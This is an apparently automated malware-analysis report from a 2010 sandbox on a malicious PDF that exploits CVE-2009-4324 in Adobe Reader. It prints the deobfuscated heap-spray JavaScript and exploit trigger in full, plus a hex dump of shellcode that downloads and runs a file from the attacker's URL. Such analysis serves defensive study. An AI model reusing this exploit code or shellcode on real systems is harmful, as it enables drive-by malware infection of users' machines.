Analysis report for http://arraysaw.com/files/fustyacidhead.pdf
Sample Overview
| URL | http://arraysaw.com/files/fustyacidhead.pdf |
|---|
| MD5 | 2b7110a889e557b509d75ccea13fe47f |
| Analysis Started | 2010-02-22 18:51:36 |
| Report Generated | 2010-02-22 18:51:22 |
| Jsand version | 1.02.02 |
See the report for domain arraysaw.com.
Detection results
| Detector | Result |
| Jsand 1.02.02 | malicious |
Exploits
| Name | Description | Reference |
| doc.media.newPlayer | Use-after-free vulnerability in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through 9.2 | CVE-2009-4324 |
Deobfuscation results
Evals
var memory;
if (app.viewerVersion >= 8){
function NS(){
var nop = unescape("%u9090%u9090");
var sc = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u612F%u7272%u7961%u6173%u2E77
%u6F63%u2F6D%u6F6C%u6461%u6470%u2E66%u6870%u3F70%u6469%u3D73%u4D41%u6C50%u7961%u7265%u4450
%u0046");
while (nop.length <= 0x10000 / 2)nop += nop;
nop = nop.substring(0, 0x10000 / 2 - sc.length);
memory = new Array();
for (i = 0; i < 0x2000; i ++ ){
memory[i] = nop + sc;
}
}
NS();
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {
this .media.newPlayer(null);
}
catch (e){
}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
| http://arraysaw.com/files/fustyacidhead.pdf | 200 | application/pdf |
Redirects
No redirects.
ActiveX controls
-
| AcrobatJavaScript |
|
Name |
Arg0 |
Count |
| Methods |
media.newPlayer |
(null) |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b
58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a
d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04
56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03
f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2
74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e
8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04
8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a
5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e
65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e
2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04
93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31
52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8
98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04
68 74 74 70 3a 2f 2f 61 72 72 61 79 73 61 77 2e
63 6f 6d 2f 6c 6f 61 64 70 64 66 2e 70 68 70 3f
69 64 73 3d 41 4d 50 6c 61 79 65 72 50 44 46 00
| 3.d.@0x..@..p...
X....@4.@|.X<jDZ
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://arraysaw.
com/loadpdf.php?
ids=AMPlayerPDF.
|
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://arraysaw.com/loadpdf.php?ids=AMPlayerPDF |
N/A |
N/A |
|